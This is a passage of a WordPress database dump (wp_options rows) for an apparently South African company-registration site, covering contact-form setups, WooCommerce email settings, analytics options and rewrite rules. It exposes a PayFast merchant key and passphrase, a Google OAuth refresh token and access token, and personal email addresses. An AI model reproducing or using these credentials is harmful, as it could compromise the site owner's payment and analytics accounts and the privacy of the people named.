Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:10:\"processors\";a:1:{s:11:\"fp_31133660\";a:5:{s:2:\"ID\";s:11:\"fp_31133660\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:6:\"Zainub\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:7:\"subject\";s:31:\"Company registration submission\";s:14:\"recipient_name\";s:17:\"{user:first_name}\";s:15:\"recipient_email\";s:17:\"{user:user_email}\";s:7:\"message\";s:556:\"Hi %recipient_name%.\n\nThanks for your submission of information required to register your company\n%proposed_company_name%.\n\nPlease note that your company name has to be approved by the Companies and Intellectual Property Commission [CIPC] in order for the registration to proceed.  \n\nIf your submitted name is not approved we will contact you to provide alternatives.\n\nIf either of the name/s provided are approved the registration will continue.\n\nWe will then contact you once the company is registered.\n\nHave a great day.\n\nwww.companyregistration.online\n\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:3:\"use\";s:5:\"group\";a:1:{s:13:\"rw42556336953\";a:1:{s:13:\"cl10722462566\";a:3:{s:5:\"field\";s:0:\"\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:0:\"\";}}}}}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:4:{s:20:\"con_2805061499476255\";a:5:{s:2:\"id\";s:20:\"con_2805061499476255\";s:4:\"name\";s:21:\"Show Business Address\";s:4:\"type\";s:4:\"show\";s:6:\"fields\";a:1:{s:18:\"cl3878994114606396\";s:11:\"fld_2828361\";}s:5:\"group\";a:1:{s:18:\"rw8312698847209985\";a:1:{s:18:\"cl3878994114606396\";a:4:{s:6:\"parent\";s:18:\"rw8312698847209985\";s:5:\"field\";s:11:\"fld_2828361\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt2058635\";}}}}s:19:\"con_420314167051725\";a:5:{s:2:\"id\";s:19:\"con_420314167051725\";s:4:\"name\";s:11:\"Directors 3\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:3:{s:18:\"cl7938739829049254\";s:11:\"fld_9988349\";s:18:\"cl6193428651277406\";s:11:\"fld_9988349\";s:18:\"cl4549233610586182\";s:11:\"fld_9988349\";}s:5:\"group\";a:3:{s:18:\"rw1795461035268564\";a:1:{s:18:\"cl7938739829049254\";a:4:{s:6:\"parent\";s:18:\"rw1795461035268564\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}s:17:\"rw127359080480711\";a:1:{s:18:\"cl6193428651277406\";a:4:{s:6:\"parent\";s:17:\"rw127359080480711\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt1518591\";}}s:18:\"rw3911997978236381\";a:1:{s:18:\"cl4549233610586182\";a:4:{s:6:\"parent\";s:18:\"rw3911997978236381\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt2755045\";}}}}s:20:\"con_1942555713747647\";a:5:{s:2:\"id\";s:20:\"con_1942555713747647\";s:4:\"name\";s:11:\"DIrectors 2\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:2:{s:17:\"cl703759481753604\";s:11:\"fld_9988349\";s:18:\"cl8564980934509177\";s:11:\"fld_9988349\";}s:5:\"group\";a:2:{s:18:\"rw7940431767921770\";a:1:{s:17:\"cl703759481753604\";a:4:{s:6:\"parent\";s:18:\"rw7940431767921770\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}s:18:\"rw8695655637604996\";a:1:{s:18:\"cl8564980934509177\";a:4:{s:6:\"parent\";s:18:\"rw8695655637604996\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt1518591\";}}}}s:20:\"con_9180242064820795\";a:5:{s:2:\"id\";s:20:\"con_9180242064820795\";s:4:\"name\";s:11:\"Directors 1\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:1:{s:18:\"cl1716097489132741\";s:11:\"fld_9988349\";}s:5:\"group\";a:1:{s:18:\"rw8723213517883387\";a:1:{s:18:\"cl1716097489132741\";a:4:{s:6:\"parent\";s:18:\"rw8723213517883387\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:7:\"version\";s:5:\"1.5.1\";}','no'),(2920,'_increment_fp_58905420','11','yes'),(2936,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:19:\"/shop/%product_cat%\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:1;}','yes'),(3024,'CF56f9709d16af8','a:21:{s:13:\"_last_updated\";s:31:\"Sun, 10 Apr 2016 13:02:44 +0000\";s:2:\"ID\";s:15:\"CF56f9709d16af8\";s:10:\"cf_version\";s:7:\"1.3.4.2\";s:4:\"name\";s:10:\"Contact us\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:6:{s:11:\"fld_8768091\";s:3:\"1:1\";s:11:\"fld_9970286\";s:3:\"1:2\";s:11:\"fld_6009157\";s:3:\"1:3\";s:11:\"fld_2758980\";s:3:\"2:1\";s:11:\"fld_7683514\";s:3:\"3:1\";s:11:\"fld_7908577\";s:3:\"4:1\";}s:9:\"structure\";s:14:\"4:4:4|12|12|12\";}s:6:\"fields\";a:6:{s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_2758980\";a:7:{s:2:\"ID\";s:11:\"fld_2758980\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"message\";s:4:\"slug\";s:7:\"message\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:92:\"<h2>How can we help?</h2>\n<p>Feel free to ask a question or simply leave a comment.</p>\n<hr>\";}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:9:\"Send Form\";s:4:\"slug\";s:9:\"send_form\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:18:\"conditional_groups\";a:0:{}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:10:\"Site Admin\";s:12:\"sender_email\";s:15:\"admin@localhost\";s:7:\"subject\";s:21:\"Contact auto-response\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:159:\"Hi %recipient_name%.\nThanks for your email.\nWe\'ll get get back to you as soon as possible!\nHere\'s a summary of your message:\n------------------------\n{summary}\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:47:\"Website contact form companyregistration.online\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:19:\"imraanmaw@gmail.com\";s:13:\"email_subject\";s:40:\"Contact us from %first_name% %last_name%\";s:13:\"email_message\";s:9:\"{summary}\";}s:7:\"version\";s:7:\"1.3.4.2\";}','no'),(3029,'woothemes-updater-version','1.5.9','yes'),(3034,'woothemes-updater-activated','a:1:{s:47:\"woocommerce-gateway-payfast/gateway-payfast.php\";a:5:{i:0;s:5:\"18596\";i:1;s:32:\"557bf07293ad916f20c207c6c9cd15ff\";i:2;s:32:\"9d9f2c5abcba50576385777ec7934a0c\";i:3;s:19:\"2018-04-12 00:00:00\";i:4;b:1;}}','yes'),(3338,'woocommerce_payfast_settings','a:10:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:7:\"PayFast\";s:11:\"description\";s:45:\"Safe and secure South African payment gateway\";s:8:\"testmode\";s:2:\"no\";s:11:\"merchant_id\";s:8:\"10619690\";s:12:\"merchant_key\";s:13:\"wzzs2bdgcuz7u\";s:16:\"send_debug_email\";s:3:\"yes\";s:11:\"debug_email\";s:28:\"nazeer@digitalstrategies.biz\";s:11:\"pass_phrase\";s:5:\"51544\";s:14:\"enable_logging\";s:2:\"no\";}','yes'),(3343,'catalog_options','','yes'),(3344,'image_options','','yes'),(3384,'product_inventory_options','','yes'),(3387,'account_page_options','','yes'),(3388,'account_endpoint_options','','yes'),(3389,'account_registration_options','','yes'),(3392,'woocommerce_new_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:50:\"info@companyregistration.online, info@mawinc.co.za\";s:7:\"subject\";s:65:\"[{site_title}] New customer order ({order_number}) - {order_date}\";s:7:\"heading\";s:18:\"New customer order\";s:10:\"email_type\";s:4:\"html\";}','yes'),(3399,'woocommerce_customer_invoice_settings','a:5:{s:7:\"subject\";s:50:\"Invoice for order {order_number} from {order_date}\";s:7:\"heading\";s:32:\"Invoice for order {order_number}\";s:12:\"subject_paid\";s:41:\"Your {site_title} order from {order_date}\";s:12:\"heading_paid\";s:28:\"Order {order_number} details\";s:10:\"email_type\";s:4:\"html\";}','yes'),(4309,'wcj_purchase_price_enabled','yes','yes'),(4310,'wcj_purchase_price_extra_enabled','yes','yes'),(4311,'wcj_purchase_price_affiliate_commission_enabled','no','yes'),(4312,'wcj_purchase_date_enabled','yes','yes'),(4313,'wcj_purchase_partner_enabled','yes','yes'),(4314,'wcj_purchase_info_enabled','yes','yes'),(4315,'wcj_checkout_files_upload_enabled','no','yes'),(4316,'wcj_checkout_files_upload_total_number','1','yes'),(4317,'wcj_checkout_files_upload_enabled_1','yes','yes'),(4318,'wcj_checkout_files_upload_required_1','no','yes'),(4319,'wcj_checkout_files_upload_hook_1','woocommerce_before_checkout_form','yes'),(4320,'wcj_checkout_files_upload_hook_priority_1','20','yes'),(4321,'wcj_checkout_files_upload_label_1','Please select file to upload','yes'),(4322,'wcj_checkout_files_upload_file_accept_1','.jpg,.jpeg,.png','yes'),(4323,'wcj_checkout_files_upload_label_upload_button_1','Upload','yes'),(4324,'wcj_checkout_files_upload_label_remove_button_1','Remove','yes'),(4325,'wcj_checkout_files_upload_notice_wrong_file_type_1','Wrong file type: \"%s\"!','yes'),(4326,'wcj_checkout_files_upload_notice_required_1','File is required!','yes'),(4327,'wcj_checkout_files_upload_notice_success_upload_1','File \"%s\" was successfully uploaded.','yes'),(4328,'wcj_checkout_files_upload_notice_upload_no_file_1','Please select file to upload!','yes'),(4329,'wcj_checkout_files_upload_notice_success_remove_1','File \"%s\" was successfully removed.','yes'),(4331,'_caldera_forms_forms','a:6:{s:15:\"CF56f6fc44b6d4f\";s:15:\"CF56f6fc44b6d4f\";s:15:\"CF56f703597f336\";s:15:\"CF56f703597f336\";s:15:\"CF56f9267c4a9bd\";s:15:\"CF56f9267c4a9bd\";s:15:\"CF56f9709d16af8\";s:15:\"CF56f9709d16af8\";s:15:\"CF5714b9a9ee4ba\";s:15:\"CF5714b9a9ee4ba\";s:15:\"CF593d53e794a4c\";s:15:\"CF593d53e794a4c\";}','no'),(4332,'CF_DB','6','yes'),(4533,'email_notification_settings','','yes'),(4534,'email_recipient_options','','yes'),(4535,'email_options','','yes'),(4536,'email_template_options','','yes'),(4541,'woocommerce_customer_completed_order_settings','a:6:{s:7:\"enabled\";s:3:\"yes\";s:7:\"subject\";s:53:\"Your {site_title} order from {order_date} is complete\";s:7:\"heading\";s:22:\"Your order is complete\";s:20:\"subject_downloadable\";s:0:\"\";s:20:\"heading_downloadable\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";}','yes'),(4556,'woocommerce_cancelled_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:50:\"info@companyregistration.online, info@mawinc.co.za\";s:7:\"subject\";s:47:\"[{site_title}] Cancelled order ({order_number})\";s:7:\"heading\";s:15:\"Cancelled order\";s:10:\"email_type\";s:4:\"html\";}','yes'),(4559,'woocommerce_failed_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:50:\"info@companyregistration.online, info@mawinc.co.za\";s:7:\"subject\";s:44:\"[{site_title}] Failed order ({order_number})\";s:7:\"heading\";s:12:\"Failed order\";s:10:\"email_type\";s:4:\"html\";}','yes'),(4653,'checkout_process_options','','yes'),(4654,'checkout_page_options','','yes'),(4655,'checkout_endpoint_options','','yes'),(4656,'payment_gateways_options','','yes'),(4657,'woocommerce_gateway_order','a:5:{s:4:\"bacs\";i:0;s:6:\"cheque\";i:1;s:3:\"cod\";i:2;s:6:\"paypal\";i:3;s:7:\"payfast\";i:4;}','yes'),(5078,'woocommerce_google_analytics_settings','a:16:{s:5:\"ga_id\";s:13:\"UA-75787658-1\";s:18:\"ga_set_domain_name\";s:30:\"www.companyregistration.online\";s:28:\"ga_standard_tracking_enabled\";s:3:\"yes\";s:30:\"ga_support_display_advertising\";s:3:\"yes\";s:26:\"ga_use_universal_analytics\";s:3:\"yes\";s:20:\"ga_anonymize_enabled\";s:3:\"yes\";s:29:\"ga_ecommerce_tracking_enabled\";s:3:\"yes\";s:25:\"ga_event_tracking_enabled\";s:3:\"yes\";s:38:\"ga_enhanced_ecommerce_tracking_enabled\";s:3:\"yes\";s:36:\"ga_enhanced_remove_from_cart_enabled\";s:3:\"yes\";s:38:\"ga_enhanced_product_impression_enabled\";s:3:\"yes\";s:33:\"ga_enhanced_product_click_enabled\";s:3:\"yes\";s:39:\"ga_enhanced_product_detail_view_enabled\";s:3:\"yes\";s:36:\"ga_enhanced_checkout_process_enabled\";s:3:\"yes\";s:36:\"ga_support_enhanced_link_attribution\";s:2:\"no\";s:23:\"ga_404_tracking_enabled\";s:3:\"yes\";}','yes'),(5258,'_cf_last_alert_check','1503844098','yes'),(5386,'yst_ga','a:1:{s:10:\"ga_general\";a:27:{s:10:\"ga_general\";a:23:{s:17:\"analytics_profile\";N;s:22:\"analytics_profile_code\";N;s:14:\"manual_ua_code\";i:0;s:20:\"manual_ua_code_field\";N;s:26:\"track_internal_as_outbound\";N;s:23:\"track_internal_as_label\";N;s:14:\"track_outbound\";i:0;s:14:\"anonymous_data\";i:0;s:16:\"enable_universal\";i:1;s:12:\"demographics\";i:0;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:19:\"dashboards_disabled\";i:0;s:13:\"anonymize_ips\";i:0;s:17:\"track_download_as\";s:5:\"event\";s:19:\"extensions_of_files\";s:30:\"doc,exe,js,pdf,ppt,tgz,zip,xls\";s:14:\"track_full_url\";s:6:\"domain\";s:18:\"subdomain_tracking\";N;s:16:\"tag_links_in_rss\";i:0;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:25:\"enhanced_link_attribution\";i:0;s:11:\"custom_code\";N;s:10:\"debug_mode\";i:0;}s:19:\"dashboards_disabled\";i:0;s:17:\"analytics_profile\";s:9:\"119404188\";s:22:\"analytics_profile_code\";s:13:\"UA-75787658-1\";s:14:\"manual_ua_code\";i:0;s:20:\"manual_ua_code_field\";s:0:\"\";s:26:\"track_internal_as_outbound\";s:0:\"\";s:23:\"track_internal_as_label\";s:0:\"\";s:14:\"track_outbound\";s:1:\"1\";s:14:\"anonymous_data\";s:1:\"1\";s:16:\"enable_universal\";s:1:\"1\";s:12:\"demographics\";i:0;s:12:\"ignore_users\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:12:\"shop_manager\";}s:13:\"anonymize_ips\";s:1:\"1\";s:17:\"track_download_as\";s:5:\"event\";s:19:\"extensions_of_files\";s:30:\"doc,exe,js,pdf,ppt,tgz,zip,xls\";s:14:\"track_full_url\";s:6:\"domain\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"tag_links_in_rss\";i:0;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:25:\"enhanced_link_attribution\";i:0;s:11:\"custom_code\";s:0:\"\";s:10:\"debug_mode\";i:0;s:7:\"version\";s:3:\"5.5\";s:14:\"yoast_ga_nonce\";s:10:\"95e1be6797\";s:16:\"ga-form-settings\";s:12:\"Save changes\";}}','yes'),(5707,'dismissed_update_core','a:1:{s:11:\"4.4.2|en_ZA\";b:1;}','yes'),(5775,'yoast-ga-access_token','a:5:{s:13:\"refresh_token\";s:66:\"1/QuF1tB2prCTiMGoyqS_gGyauPmWPEdzS-Cr_EICes7590RDknAdJa_sgfheVM0XT\";s:12:\"access_token\";s:76:\"ya29.CjMPAx3kDhmjwIc6A09av610diAwMEMz4q6lt4Pqsg1zsPWfnt1h285o2eK6y9fuzzJ9mtE\";s:7:\"expires\";i:1467131215;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1467120415;}','yes'),(6379,'woocommerce_admin_footer_text_rated','1','yes'),(6458,'category_children','a:1:{i:39;a:6:{i:0;i:111;i:1;i:112;i:2;i:113;i:3;i:114;i:4;i:115;i:5;i:146;}}','yes'),(6758,'rewrite_rules','a:260:{s:34:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml$\";s:40:\"index.php?xml_sitemap=params=$matches[2]\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml\\.gz$\";s:49:\"index.php?xml_sitemap=params=$matches[2];zip=true\";s:35:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html$\";s:50:\"index.php?xml_sitemap=params=$matches[2];html=true\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html.gz$\";s:59:\"index.php?xml_sitemap=params=$matches[2];html=true;zip=true\";s:24:\"^wc-auth/v([1]{1})/(.*)?\";s:63:\"index.php?wc-auth-version=$matches[1]&wc-auth-route=$matches[2]\";s:22:\"^wc-api/v([1-3]{1})/?$\";s:51:\"index.php?wc-api-version=$matches[1]&wc-api-route=/\";s:24:\"^wc-api/v([1-3]{1})(.*)?\";s:61:\"index.php?wc-api-version=$matches[1]&wc-api-route=$matches[2]\";s:10:\"project/?$\";s:27:\"index.php?post_type=project\";s:40:\"project/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:35:\"project/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:27:\"project/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=project&paged=$matches[1]\";s:7:\"shop/?$\";s:27:\"index.php?post_type=product\";s:37:\"shop/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:32:\"shop/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=product&feed=$matches[1]\";s:24:\"shop/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=product&paged=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:32:\"category/(.+?)/wc-api(/(.*))?/?$\";s:54:\"index.php?category_name=$matches[1]&wc-api=$matches[3]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:29:\"tag/([^/]+)/wc-api(/(.*))?/?$\";s:44:\"index.php?tag=$matches[1]&wc-api=$matches[3]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:56:\"layout_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?layout_category=$matches[1]&feed=$matches[2]\";s:51:\"layout_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?layout_category=$matches[1]&feed=$matches[2]\";s:32:\"layout_category/([^/]+)/embed/?$\";s:48:\"index.php?layout_category=$matches[1]&embed=true\";s:44:\"layout_category/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?layout_category=$matches[1]&paged=$matches[2]\";s:26:\"layout_category/([^/]+)/?$\";s:37:\"index.php?layout_category=$matches[1]\";s:52:\"layout_pack/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_pack=$matches[1]&feed=$matches[2]\";s:47:\"layout_pack/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_pack=$matches[1]&feed=$matches[2]\";s:28:\"layout_pack/([^/]+)/embed/?$\";s:44:\"index.php?layout_pack=$matches[1]&embed=true\";s:40:\"layout_pack/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?layout_pack=$matches[1]&paged=$matches[2]\";s:22:\"layout_pack/([^/]+)/?$\";s:33:\"index.php?layout_pack=$matches[1]\";s:52:\"layout_type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_type=$matches[1]&feed=$matches[2]\";s:47:\"layout_type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?layout_type=$matches[1]&feed=$matches[2]\";s:28:\"layout_type/([^/]+)/embed/?$\";s:44:\"index.php?layout_type=$matches[1]&embed=true\";s:40:\"layout_type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?layout_type=$matches[1]&paged=$matches[2]\";s:22:\"layout_type/([^/]+)/?$\";s:33:\"index.php?layout_type=$matches[1]\";s:46:\"scope/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?scope=$matches[1]&feed=$matches[2]\";s:41:\"scope/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?scope=$matches[1]&feed=$matches[2]\";s:22:\"scope/([^/]+)/embed/?$\";s:38:\"index.php?scope=$matches[1]&embed=true\";s:34:\"scope/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?scope=$matches[1]&paged=$matches[2]\";s:16:\"scope/([^/]+)/?$\";s:27:\"index.php?scope=$matches[1]\";s:53:\"module_width/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?module_width=$matches[1]&feed=$matches[2]\";s:48:\"module_width/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?module_width=$matches[1]&feed=$matches[2]\";s:29:\"module_width/([^/]+)/embed/?$\";s:45:\"index.php?module_width=$matches[1]&embed=true\";s:41:\"module_width/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?module_width=$matches[1]&paged=$matches[2]\";s:23:\"module_width/([^/]+)/?$\";s:34:\"index.php?module_width=$matches[1]\";s:40:\"et_pb_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"et_pb_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"et_pb_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"et_pb_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"et_pb_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"et_pb_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"et_pb_layout/([^/]+)/embed/?$\";s:60:\"index.php?post_type=et_pb_layout&name=$matches[1]&embed=true\";s:33:\"et_pb_layout/([^/]+)/trackback/?$\";s:54:\"index.php?post_type=et_pb_layout&name=$matches[1]&tb=1\";s:41:\"et_pb_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:67:\"index.php?post_type=et_pb_layout&name=$matches[1]&paged=$matches[2]\";s:48:\"et_pb_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?post_type=et_pb_layout&name=$matches[1]&cpage=$matches[2]\";s:38:\"et_pb_layout/([^/]+)/wc-api(/(.*))?/?$\";s:68:\"index.php?post_type=et_pb_layout&name=$matches[1]&wc-api=$matches[3]\";s:44:\"et_pb_layout/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:55:\"et_pb_layout/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:37:\"et_pb_layout/([^/]+)(?:/([0-9]+))?/?$\";s:66:\"index.php?post_type=et_pb_layout&name=$matches[1]&page=$matches[2]\";s:29: